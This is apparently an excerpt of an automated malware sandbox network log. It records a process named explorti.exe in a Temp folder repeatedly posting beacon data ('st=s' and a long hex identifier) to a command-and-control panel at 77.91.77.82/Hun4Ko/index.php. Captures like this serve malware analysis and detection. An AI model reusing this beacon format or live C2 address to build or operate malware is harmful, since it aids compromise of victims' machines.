                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:37:42.576458931 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:42 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                40192.168.2.44978277.91.77.82807548C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:37:42.692070007 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:37:43.419336081 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:43 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:37:43.420042038 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:37:43.649703026 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:43 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                41192.168.2.44978377.91.77.82807548C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:37:43.775224924 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:37:44.494673014 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:44 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:37:44.495500088 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:37:44.717470884 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:44 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                42192.168.2.44978477.91.77.82807548C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:37:44.832113981 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:37:45.527661085 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:45 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:37:45.528738022 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:37:45.747570992 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:45 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                43192.168.2.44978577.91.77.82807548C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:37:45.864311934 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:37:46.566370964 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:46 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:37:46.567142963 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:37:46.783113956 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:46 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                44192.168.2.44978677.91.77.82807548C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:37:46.894582033 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:37:47.619394064 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:47 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:37:47.620273113 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:37:47.852102995 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:47 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                45192.168.2.44978777.91.77.82807548C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:37:48.119514942 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:37:48.812824011 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:48 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:37:48.813637018 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:37:49.030213118 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:48 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                46192.168.2.44978877.91.77.82807548C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:37:49.143924952 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:37:49.848337889 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:49 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:37:49.849245071 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:37:50.066159964 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:49 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                47192.168.2.44978977.91.77.82807548C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:37:50.179145098 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:37:50.893464088 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:50 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:37:50.894282103 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:37:51.122097969 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:51 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                48192.168.2.44979077.91.77.82807548C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:37:51.238399982 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:37:51.950551033 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:51 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:37:51.951564074 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:37:52.177917957 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:52 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                49192.168.2.44979177.91.77.82807548C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:37:52.284516096 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:37:52.980564117 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:52 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:37:52.981236935 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:37:53.199307919 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:53 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                50192.168.2.44979277.91.77.82807548C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:37:53.317128897 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:37:54.018511057 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:53 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:37:54.019181013 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:37:54.237591982 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:54 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                51192.168.2.44979377.91.77.82807548C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
